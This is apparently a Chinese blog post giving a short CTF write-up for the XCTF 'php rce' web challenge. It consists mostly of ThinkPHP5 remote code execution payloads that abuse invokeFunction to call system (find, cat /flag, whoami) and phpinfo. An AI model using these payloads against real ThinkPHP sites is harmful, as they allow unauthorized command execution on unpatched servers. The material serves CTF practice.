您的位置:首页 > 编程语言 > PHP开发

攻防世界web高阶(php rce)

2020-07-16 10:40 197 查看

需要自己百度下thinkphp5的漏洞(其实看完就知道怎么做这个题目了)
payload:
s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪
s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 看flag

利用system函数远命令执行:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.通过phpinfo函数写出phpinfo()的信息
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: